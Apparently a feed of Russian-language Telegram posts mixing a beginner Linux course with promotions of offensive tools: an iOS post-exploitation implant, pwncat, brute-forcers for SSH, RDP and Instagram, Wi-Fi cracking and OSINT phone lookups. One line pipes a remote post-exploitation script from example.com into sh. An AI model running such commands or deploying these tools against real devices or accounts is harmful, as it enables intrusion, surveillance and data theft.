Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Первая серия материалов: "Введение в Linux"

Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.

LH | Новости | Курсы | Мемы

SeaShell Framework - новый инструмент для эксплуатации iOS

SeaShell Framework - это платформа для последующей эксплуатации iOS, которая позволяет вам получать удаленный доступ к устройству, управлять им и извлекать конфиденциальную информацию.

Основные особенности:

— Генератор IPA - Генерирует файлы IPA, которые можно установить на целевое устройство через TrollStore или другой установщик IPA, обходящий CoreTrust.
— Мощный имплантат - SeaShell использует продвинутую полезную нагрузку под названием Pwny, которую можно дополнить своими собственными модулями или плагинами.
— Базовый набор модулей - SeaShell идет с рядом модулей, которые могут извлекать пользовательские данные, включая SMS, голосовую почту, историю Safari и многое другое.
— Зашифрованная связь - Вся коммуникация между устройством и SeaShell шифруется с использованием TLS 1.3.
— Регулярные обновления - SeaShell активно поддерживается и регулярно обновляется.

Поддерживается широкий спектр версий iOS, поскольку все они уязвимы для ошибки CoreTrust. Это может быть iOS 14, 15, 16 или ранняя версия 17. SeaShell была только что выпущена и сейчас находится в стадии бета версии.

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Первая серия материалов: "Введение в Linux"

Основные команды командной строки Linux: cd, ls, mkdir, rm и другие.

LH | Новости | Курсы | Мемы

LH | Новости | Курсы | Мемы

Топ популярных постов за прошедшую неделю (сохрани себе и отправь другу):

1. Предыдущий топ статей
2. Обратная Сторона Кода: Глубокое Погружение в Мир Вредоносного ПО
3. Установка и настройка tor в Linux Mint
4. BEE·bot — рекурсивный интернет-сканер для хакеров
5. SSH-Snake - это мощный инструмент, предназначенный для автоматического обхода сети с использованием закрытых ключей SSH.
6. Получение мостов tor из GMail с помощью Python


#подборка

LH | Новости | Курсы | Мемы

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Первая серия материалов: "Введение в Linux"

Структура файловой системы Linux: /bin, /etc, /home и другие.

LH | Новости | Курсы | Мемы

Шесть лучших инструментов для работы с прокси

1. Bloody-Proxy-Scraper - Простой инструмент для получения хороших и проверенных прокси.

2. Lunus BPS - Инструмент для получения прокси и проверки их валидности в режиме реального времени. Поддерживает HTTP/s, SOCKS4, и SOCKS5.

3. Free-proxy - Еще одна софтина на bash, работает под termux.

4. free-proxy-list - Список валидных прокси, который часто обнавляется.

5. Valid8Proxy - Инструмент, разработанный для извлечения, проверки и хранения работающих прокси.

6. ProxyKot - Быстрый поиск прокси. Поддерживает HTTP/s и SOCKS.

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Начало Aircrack-ng и WEF

#статья

Думаю не секрет, что довольно многие начинали свой путь в ИБ с вопроса "Как взломать Wi-Fi соседа?", а дальше углублялись в эту тему и находили что-то намного интересней чем просто бесплатный интернет.

В этой статье вы познакомитесь с Aircrack-ng и ещё одним удобным инструментом вардрайвинга - WEF (WiFi Exploitation Framework). Так же мы разберем все базовые атаки на беспроводные точки доступа.

Ссылка на статью

LH | Новости | Курсы | Мемы

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Первая серия материалов: "Введение в Linux"

Пакетный менеджер APT для установки и обновления программ.

LH | Новости | Курсы | Мемы

Pwncat — это мощный и гибкий инструмент для работы с оболочками, объединивший все лучшие качества классического Netcat и дополнивший их уникальными функциями.

- Pwncat обеспечивает удобное управление удалёнными оболочками.

- Этот инструмент способен автоматически обходить защиту Firewall, IDS/IPS.

- Pwncat предоставляет инструментарий для автоматического повышения привилегий.

- Он обладает высокой степенью настраиваемости, что позволяет адаптировать инструмент под индивидуальные потребности каждого пользователя.

- Pwncat предлагает методы установки постоянного соединения с удалёнными оболочками, позволяет создать "неубиваемый шелл".

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Грубая сила. Брутим RDP, SSH, VNC, Instagram и стандартные формы веб-аутентификации

#статья

Часто при проведении тестирования применяется брутфорс или, другими словами, метод "грубой силы". С помощью этой атаки взломщики могут получить несанкционированный доступ к административной панели веб-сайта, учетной записи пользователя или другой вид доступа с помощью различных протоколов.

В этой статье мы разберём инструмент для брутфорса - Crowbar и ещё два полезных брутфорсера для более узконаправленных задач.

Приятного чтения!

LH | Новости | Курсы | Мемы

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Первая серия материалов: "Введение в Linux"

Основы текстового редактора nano: открытие, редактирование и сохранение файлов.

LH | Новости | Курсы | Мемы

#рекомендации
#рекомендация

Обзор бесплатных инструментов для реверс-инжиниринга

На первой неделе курса "Linux для новичков" мы познакомились с основами операционной системы Linux.

Мы узнали, что такое Linux, почему его выбирают и какие основные дистрибутивы существуют. Мы изучили различия способов установки Linux, а также освоили основные команды командной строки и познакомились со структурой файловой системы Linux.

Эти знания и навыки являются фундаментом для дальнейшего изучения Linux и помогут нам успешно преодолевать дальнейшие вызовы курса. Если вы что-то пропустили и желаете прочитать, то вот список материалов первой недели:

Неделя 1: Введение в Linux
• Что такое Linux и почему его выбирают?
• Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др.
• Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.
• Основные команды командной строки Linux: cd, ls, mkdir, rm и др.
• Структура файловой системы Linux: /bin, /etc, /home и др.
• Пакетный менеджер APT для установки и обновления программ.
• Основы текстового редактора nano: открытие, редактирование и сохранение файлов.

Не забывайте следить и делиться нашим бесплатным курсом "Linux для новичков"!

Следующую неделю мы посвятим теме «Работа с файлами и директориями».

#Linux #обучениеlinux #статьипоLinux

LH | Новости | Курсы | Мемы

Amnesiac и Bashark: Два инструмента пост-эксплуатации для Windows и Linux.

Amnesiac - это инструмент для пост-эксплуатации Windows, предназначенный для упрощения горизонтального перемещения в средах Windows. Разработанный на PowerShell, Amnesiac работает в памяти, что позволяет избежать установки и, таким образом, снижает риск обнаружения.

Этот инструмент передает команды через именованные каналы, имеет интуитивно понятный интерфейс и оснащен разнообразными модулями, упрощающими процесс тестирования.

P.S. Возможность выполнения из памяти, хоть и снижает риски быть обнаруженным, но не исключат их. Неплохая альтернатива инструментов для пост-эксплуатации, которые нужно загружать на целевую систему.

Bashark: Инструмент пост-эксплуатации для Linux

Bashark предназначен специально для операционных систем Linux и предлагает обширный набор функций, делая его полезным для специалистов по кибербезопасности.

Благодаря Bashark, вам будет проще выполнять разнообразные задачи, связанные с эксплуатацией системы, включая сбор информации, управление процессами и файлами и многое другое.

P.S. Инструмент является bash-скриптом, что дает возможность запуска без загрузки на целевую ОС и избавляет от необходимости загружать зависимости.

curl -L http://example.com/bashark.sh | sh

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Вторая серия материалов: "Работа с файлами и директориями"

Основные команды для работы с файлами и директориями: cp, mv, rm и другие.

Первая серия материалов.

LH | Новости | Курсы | Мемы

Защита систем от продвинутых кибератак — непростая задача, особенно в случае закрытых систем, таких как iOS

Этим летом «Лаборатория Касперского» сообщила об APT-кампании Операция Триангуляция, которой подверглись iOS-устройства. Для атак использовался сложный метод распространения эксплойтов — через сообщения в iMessage, который не требовал каких-либо действий от пользователей. В результате злоумышленники получали полный контроль над устройством и пользовательскими данными. Основной целью атакующих был шпионаж. Чтобы провести детальный технический анализ, потребовалось много времени — из-за сложности атаки и закрытости iOS.

Также не стоит забывать про инцидент случившийся пару лет назад, когда сотрудники компании ZecOps, специализирующейся на кибербезопасности, обнаружили во всех моделях iPhone уязвимость, связанную с программным обеспечением NoReboot, которое умеет красть личные данные владельцев и имитировать перезагрузку гаджета. NoReboot внедряет вредоносный код в фоновые процессы, которые ответственны за включение и выключение «яблочных» аппаратов.

Ссылка на GitHub с PoC (proof of concept)

Поэтому, владельцам iPhone и проприетарного ПО следует быть особенно бдительными и внимательными к обновлениям, предлагаемым производителями. Только так можно обеспечить безопасность своих данных и личной информации. Помните, что в мире цифровых технологий безопасность всегда на первом месте, и лучше заранее предусмотреть возможные угрозы, чем потом раскаиваться в принятии легкомысленных решений.

LH | Новости | Курсы | Мемы

Расширяем арсенал OSINT: Пять инструментов для анализа и поиска данных

В эпоху цифровой информации, умение эффективно собирать и анализировать данные из открытых источников становится критически важным навыком. Подборка пяти малоизвестных инструментов OSINT:

MetaDetective — этот простой в использовании инструмент анализирует метаданные файлов и извлекает из них важную информацию, включая имена создателей документов, пользователей, внесших изменения, и многие другие данные, которые могут быть скрыты в файле.

E4GL30S1NT — OSINT инструмент для сбора информации, включая данные из Facebook, поиск электронной почты, Google поиск, сведения о телефонных номерах, DNS и WHOIS запросы, а также трассировку IP.

Moriarty-Project — это инструмент, который предоставляет всестороннюю информацию о введенном номере телефона. Он не только пытается найти владельца номера, но и проверяет его на спам, комментарии, а также связанные социальные сети и поисковые отчеты.

dorks_hunter — он создан для выявления уязвимостей в веб-приложениях и для сбора информации о цели через google-доркинг,скрипт на питоне очень простой.

truffleHog — это инструмент, который просматривает git репозитории на предмет случайно загруженных ключей доступа, паролей и другой чувствительной информации.

LH | Новости | Курсы | Мемы

#подборка

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Вторая серия материалов: "Работа с файлами и директориями"

Работа с архивами в Linux: создание, разархивирование, просмотр.

Первая серия материалов.

LH | Новости | Курсы | Мемы